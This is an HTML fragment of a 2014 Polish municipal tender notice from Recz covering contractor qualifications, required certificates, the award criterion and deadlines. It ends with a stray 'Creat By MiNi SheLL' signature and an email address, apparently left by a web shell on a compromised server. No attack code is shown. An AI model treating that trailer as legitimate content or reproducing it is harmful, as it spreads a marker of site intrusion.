wykonane, wykonawca nie ma obowiązku przedkładania dowodów. Wykonawca składa wykaz wg zał. Nr 6 do SIWZ wraz z poświadczeniami lub innymi dokumentami.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.Oświadeczenie, że dysponują lub będą dysponować narzędziami, sprzętem, potencjałem technicznym w celu realizacji zamówienia. Zamawiający uzna za spełnienie warunku złożenie oświadczenia zał. Nr 4 do SIWZ. Uwaga: Jeżeli wykonawca, wykazując spełnienie warunków, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, wykonawca zobowiązany jest do przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdziale XI niniejszej SIWZ (dokumenty potwierdzające brak wykluczenia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Dysponują lub będą dysponować kadrą techniczną z uprawnieniami budowlanym do kierowania robotami budowlanymi w zakresie: - o specjalności branży budowlanej konstrukcyjnej - kierownik budowy, - o specjalności branży elektrycznej - kierownik robót, - o specjalności branży elektrycznej- kierownik robót. Wykonawca składa stosowne oświadczenie o spełnieniu warunków wynikających z art. 22 ust. 1 Pzp ( zał. Nr 4 i nr 7 do SIWZ). Zamawiający uzna za spełnienie warunku złożenie oświadczenia przez Wykonawcę wraz z informacją o podstawie do dysponowania tymi osobami. Najpóźniej w dniu podpisania umowy, wybrany wykonawca jest zobowiązany wskazać osoby, które w jego imieniu będą pełniły obowiązki : - kierownika budowy posiadającego uprawnienia budowlane o specjalności konstrukcyjnej oraz - kierownika robót posiadającego wymagane uprawnienia budowlane w zakresie elektrycznym, - kierownika robót posiadającego wymagane uprawnienia budowlane w zakresie sanitarnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	a) informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzającej posiadanie środków finansowych lub zdolność kredytową w wysokości 300 tys. zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. b) opłaconej polisy ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności z przedmiotem zamówienia na kwotę 600 tys. zł. Na potwierdzenie opłaconej polisy wykonawca winien dołączyć dowód opłaty. Jeżeli wykonawca, wykazując spełnienie warunku, o którym mowa w art. 22 ust. 1 pkt. 4 ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy, wykonawca zobowiązany jest do przedłożenia informacji, o której mowa w ww. pkt.4 lit. a. 5). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 6). Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawarte zostały w Załączniku Nr 9 do SIWZ. 2. Umowa może ulec zmianie w zakresie z tytułu okoliczności opisanych w pkt. 11 załączniku nr 9 do SIWZ - projekt umowy : 2.1. Ceny - w przypadkach opisanych w Rozdziale XVII SIWZ - opis sposobu obliczania ceny i wynagrodzenia oraz ustaleń projektu umowy zał. Nr 9 do SIWZ. 2.2 Terminu - w przypadku zwiększenia zakresu robót zamówienia podstawowego lub konieczności udzielenia zamówienia dodatkowego, sytuacji niemożliwych do przewidzenia na etapie składania ofert - termin może ulec przesunięciu za zgodą Zamawiającego. 2.3. Zmiany stawki podatku VAT - w przypadku zmiany stawki należnego podatku VAT, stawka wysokości należnego podatku VAT obowiązywać będzie na dzień wystawienia faktury przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.recz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Reczu, ul. Ratuszowa 17, 73 - 210 Recz, pok. nr 22..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 10:00, miejsce: Urząd Miejski w Reczu, ul. Ratuszowa 17, 73 - 210 Recz, pok. Nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com